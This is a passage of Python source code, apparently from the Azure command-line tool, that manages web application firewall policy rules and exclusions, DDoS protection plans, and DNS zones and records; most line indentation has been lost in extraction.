priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
    Add a managed rule set to the WAF policy's managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
    Update (override) an existing rule set in the WAF policy's managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
rg.rules = managed_rule_overrides # differentiate with add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
    Remove a rule group override from the managed rule set if rule_group_name is specified; otherwise, remove the whole rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# pylint: disable=line-too-long
# pylint: disable=too-many-nested-blocks
def add_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None, rule_ids=None):
ExclusionManagedRuleSet, ExclusionManagedRuleGroup, ExclusionManagedRule = \
cmd.get_models('ExclusionManagedRuleSet', 'ExclusionManagedRuleGroup', 'ExclusionManagedRule')
waf_policy = client.get(resource_group_name, policy_name)
# build current rules from ids
rules = [ExclusionManagedRule(rule_id=rule_id) for rule_id in rule_ids] if rule_ids is not None else []
# build current rule group from rules
curr_rule_group = None
if rule_group_name is not None:
curr_rule_group = ExclusionManagedRuleGroup(rule_group_name=rule_group_name,
rules=rules)
# build current rule set from rule group
curr_rule_set = ExclusionManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_groups=[curr_rule_group] if curr_rule_group is not None else [])
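    # Merge strategy (the for/else blocks below use Python's loop-else, which only runs
    # when the loop completes without a break): if an exclusion with the same
    # match_variable/selector_match_operator/selector already exists, the new rule set,
    # rule group or rules are grafted into it at the deepest level that already matches;
    # if no such exclusion exists, the loop falls through and nothing is appended.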
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_group in rule_set.rule_groups:
# add rules when rule group exists
if rule_group.rule_group_name == rule_group_name:
rule_group.rules.extend(rules)
break
else:
# add a new rule group
if curr_rule_group is not None:
rule_set.rule_groups.append(curr_rule_group)
break
else:
# add a new rule set
exclusion.exclusion_managed_rule_sets.append(curr_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
# pylint: disable=line-too-long
def remove_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None):
waf_policy = client.get(resource_group_name, policy_name)
to_be_deleted = None
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_group_name is None:
to_be_deleted = rule_set
break
rule_group = next((rule_group for rule_group in rule_set.rule_groups if rule_group.rule_group_name == rule_group_name), None)
if rule_group is None:
err_msg = f"Rule set group [{rule_group_name}] is not found."
raise ResourceNotFoundError(err_msg)
rule_set.rule_groups.remove(rule_group)
if to_be_deleted:
exclusion.exclusion_managed_rule_sets.remove(to_be_deleted)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
# if no VNETs can do a simple PUT
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
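        # Reconciliation sketch (illustrative only): with existing VNets {A, B} and a
        # requested set {B, C}, C is attached to this plan and A is detached while B is
        # left alone; a single empty value yields an empty vnet_ids set and therefore
        # detaches every currently attached VNet.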
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# Add a name server (NS) delegation record for the newly created child zone in its parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
    :param parent_zone: the parent zone name or the full resource ID of the parent zone.
        If only the zone name is given, the current subscription and the child zone's resource group are assumed.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
            print('Delegation added successfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
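    # e.g. 'A' -> 'a_records', 'SPF' -> 'txt_records' (SPF data is stored as TXT records);
    # 'CNAME' and 'SOA' map to singular properties because a record set holds at most one
    # of each. Unknown types raise KeyError.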
return type_dict[key.lower()]
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
    return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
                            ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
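    # DNS TXT data is carried as character-strings of at most 255 bytes each, so longer
    # values are split into 255-character chunks below; e.g. a 300-character value becomes
    # two strings of 255 and 45 characters, and the assert verifies nothing was dropped.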
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
